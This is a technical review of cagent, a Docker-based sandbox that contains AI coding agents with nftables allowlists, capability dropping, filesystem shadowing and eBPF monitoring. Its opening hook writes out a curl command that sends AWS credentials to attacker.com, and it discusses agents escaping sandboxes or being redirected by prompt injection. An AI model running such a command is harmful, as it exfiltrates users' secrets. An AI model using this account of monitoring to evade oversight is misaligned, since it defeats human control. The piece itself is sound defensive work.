Cagent: Building a Multi-Layer Sandbox for AI Agents That Might Try to Escape
Hook
Your AI coding assistant just executed curl https://attacker.com --data-binary @"$HOME/.aws/credentials". If that sentence makes your stomach drop, you need to understand sandboxing technology like Membrane's cagent.
Context
AI coding assistants have become remarkably capable—they can write complex functions, refactor codebases, and execute shell commands to test their work. But this capability comes with a dark side: these agents have full access to your filesystem, network, and credentials. They can read your SSH keys, exfiltrate proprietary code, or accidentally run destructive commands. Most developers trust commercial tools like GitHub Copilot or Cursor implicitly, but what about experimental open-source agents? What about fine-tuned models from unknown sources? What about the inevitable moment when a prompt injection attack tricks your trusted assistant into malicious behavior?
The container security world has mature tools for isolating workloads—Docker, gVisor, Firecracker—but they weren’t designed for the unique threat model of AI agents. Traditional containers assume you control the code inside them. AI agents are different: they’re autonomous, unpredictable, and increasingly capable of sophisticated escape attempts. Membrane’s cagent project tackles this problem with a defense-in-depth approach, combining network filtering, filesystem controls, capability dropping, and eBPF-based observability into a single Docker-based sandbox specifically designed to contain AI agents.
Technical Insight
Cagent’s architecture layers multiple isolation mechanisms, each addressing a different attack vector. The foundation is a hardened Docker container, but the real innovation lies in how these layers interact.
The network layer uses nftables to implement a domain allowlist with continuous DNS resolution. Most firewall solutions suffer from stale IP addresses—you allowlist api.openai.com, but the IP changes and your rules become outdated. Cagent solves this by running a background goroutine that re-resolves allowed domains every few minutes and updates nftables rules dynamically:
func updateFirewallRules(domains []string) {
	for _, domain := range domains {
		ips, err := net.LookupIP(domain)
		if err != nil {
			log.Printf("Failed to resolve %s: %v", domain, err)
			continue
		}
		for _, ip := range ips {
			// Add each resolved address to the nftables allowlist set.
			out, err := exec.Command("nft", "add", "element", "inet", "filter",
				"allowed_ips", fmt.Sprintf("{ %s }", ip)).CombinedOutput()
			if err != nil {
				log.Printf("nft add element failed for %s: %v (%s)", ip, err, out)
			}
		}
	}
}
The clever part: after setting up the firewall, cagent drops the NET_ADMIN and NET_RAW capabilities. The agent can’t modify these rules or create raw sockets to bypass them. This prevents a common container escape where processes regain privileges through capability manipulation.
Filesystem isolation uses bind mounts with shadow overlays. Instead of mounting your entire home directory, cagent creates a shadow filesystem that selectively exposes only what the agent needs. Your real ~/.ssh directory never enters the container—instead, the agent sees an empty directory or a read-only copy. This is implemented through Docker volume mappings, but with a twist:
# Real filesystem structure
/home/user/.ssh/ # Never mounted
/home/user/projects/ # Mounted read-only
/home/user/.cagent-home/ # Persistent agent workspace
# What the agent sees
/home/agent/.ssh/ # Empty
/home/agent/projects/ # Read-only access
/home/agent/workspace/ # Full read-write
The observability layer leverages Tracee, an eBPF-based security tracing tool. Unlike traditional logging that requires application cooperation, eBPF hooks into kernel events. When the agent executes a command, opens a file, or makes a network connection, Tracee captures it without the agent’s knowledge or ability to tamper with logs. The trace output is JSON, making it easy to analyze:
# Extract all network connections made by the agent
docker exec cagent cat /tmp/tracee/out.json | \
jq 'select(.eventName == "connect") | .args.addr'
This gives you a complete audit trail of agent behavior. Did it try to access /etc/passwd? Did it attempt connections to unexpected domains? The eBPF approach means even if the agent achieves partial compromise, it can’t hide its tracks.
The Docker-in-Docker support is perhaps the most sophisticated feature. Many AI coding assistants want to spin up containers for testing—run a PostgreSQL instance, build a Docker image, execute code in an isolated environment. Cagent uses Sysbox, a runtime that enables nested containerization without privileged mode. The agent can run docker run commands, but those containers are still trapped within cagent’s outer sandbox. It’s isolation all the way down.
The entrypoint orchestration ties everything together. Cagent uses gosu to drop privileges after initialization, ensuring the agent runs as an unprivileged user. The startup sequence is carefully ordered: initialize firewall (requires root), drop capabilities, switch to unprivileged user, start Tracee, launch agent. This ordering is critical—any deviation could create a privilege escalation window.
Gotcha
Cagent’s biggest limitation is its Linux-only requirement. The combination of nftables, eBPF, and Sysbox simply doesn’t work on macOS or Windows. For developers on those platforms—which includes a large percentage of the AI coding assistant user base—cagent is a non-starter unless they’re willing to run a Linux VM, which adds significant friction. This is particularly painful because macOS and Windows are where commercial AI assistants like Cursor and GitHub Copilot have gained the most traction.
The network allowlist requirement creates operational overhead that many developers will find prohibitive. You need to know in advance every domain your agent might legitimately access. OpenAI’s API? Sure. GitHub’s API? Probably. But what about the PyPI package index when the agent wants to install a dependency? What about Stack Overflow when it wants to search for solutions? What about the dozens of CDNs and mirrors that package managers might hit? You’ll spend time debugging mysterious failures where the agent can’t complete tasks, only to discover it’s hitting an undocumented API endpoint. The dynamic DNS resolution helps with IP changes, but it doesn’t help with discovering new domains.
eBPF tracing generates significant data volume for long-running sessions. An active agent making thousands of system calls per minute can produce gigabytes of trace data. Cagent doesn’t include built-in trace analysis tools—you’re expected to parse JSON with jq and write your own alerting logic. For security researchers, this is fine. For developers who just want safe AI assistance, it’s a burden. There’s also a performance overhead, though in practice it’s usually acceptable for development workloads.
Verdict
Use if: You're running experimental or untrusted AI agents against sensitive codebases where the risk of credential theft or data exfiltration is real. This includes security researchers testing agent vulnerabilities, enterprises evaluating AI tools before company-wide deployment, or developers working with proprietary code who want AI assistance without full trust. The setup cost is worth it when you're dealing with SSH keys, AWS credentials, or intellectual property that could cause serious damage if leaked. Also use it if you're developing AI agents yourself and want to test their behavior in a realistic but contained environment.
Skip if: You're on macOS or Windows without a Linux VM, working on hobby projects with no sensitive data, or using established commercial tools with strong safety records. The configuration overhead and Linux requirement make cagent impractical for casual use. If your threat model is "I want to prevent obvious mistakes" rather than "I need to assume compromise," Docker's built-in seccomp profiles or running your agent in a dedicated VM is probably sufficient. Also skip if you need Windows-specific tooling or can't tolerate the network allowlist maintenance burden.